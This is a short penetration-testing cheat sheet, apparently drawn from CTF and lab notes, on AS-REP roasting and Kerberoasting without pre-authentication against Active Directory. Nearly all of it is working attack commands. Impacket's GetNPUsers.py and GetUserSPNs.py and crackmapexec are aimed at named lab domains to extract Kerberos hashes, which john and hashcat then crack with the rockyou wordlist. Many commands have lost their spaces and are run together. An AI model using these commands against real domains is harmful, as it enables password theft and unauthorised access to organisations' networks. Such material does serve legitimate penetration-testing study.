Kerberos attack using username only. No credential is required.
ASREProast
AS-REP roasting is a technique that allows retrieving password hashes for users that have Do not require Kerberos preauthentication property selected.
Linux
# Get ASREProastable credentialsGetNPUsers.pyrebound.htb/-usersfileusers-rebound.htb.txt-formatjohnGetNPUsers.pyoscp.lab/-usersfileusernames.txt-formathashcatGetNPUsers.pybrute.com/-usersfileusers-brute.com.txt-dc-ip172.31.3.3-formatjohnGetNPUsers.py blackfield.local/ -usersfile users-blackfield.local.txt -dc-ip $RHOST -format john -outputfile ./hash-ASREP.txt
# users list dynamically queried with an LDAP anonymous bindGetNPUsers.py-request-formathashcat-outputfileASREProastables.txt-dc-ip $KeyDistributionCenter 'DOMAIN/'# With crackmapexec crackmapexecldaprebound.htb-uusers.txt-p''--asreproasthash-ASREP.txt# Crack the hashjohn--wordlist=/usr/share/wordlists/rockyou.txthash-ASREP.txthashcat-m18200-a0hash-ASREP.txt/usr/share/wordlists/rockyou.txt--show
# With userlistsudoGetNPUsers.pyiptracej.local/-dc-ip10.10.10.161-usersfileusernames.txt# With a single username GetNPUsers.pyabsolute.htb/d.klay-dc-ip10.129.192.41-no-pass-formathashcathashcat-m18200hash.txt/usr/share/wordlists/rockyou.txt
Kerberoast w/o pre-authentication
If an attacker knows of an account for which pre-authentication isn't required (i.e. an ASREProastable account), as well as one (or multiple) service accounts to target, a Kerberoast attack can be attempted without having to control any Active Directory account (since pre-authentication won't be required).
Linux
# ThePorgs version should be used# # pipenv shell# git clone https://github.com/ThePorgs/impacket# cd impacket/# pip3 install .GetUserSPNs.pyrebound.htb/-no-preauthjjones-usersfileusers.txt-target-domainrebound.htb-dc-ip $RHOST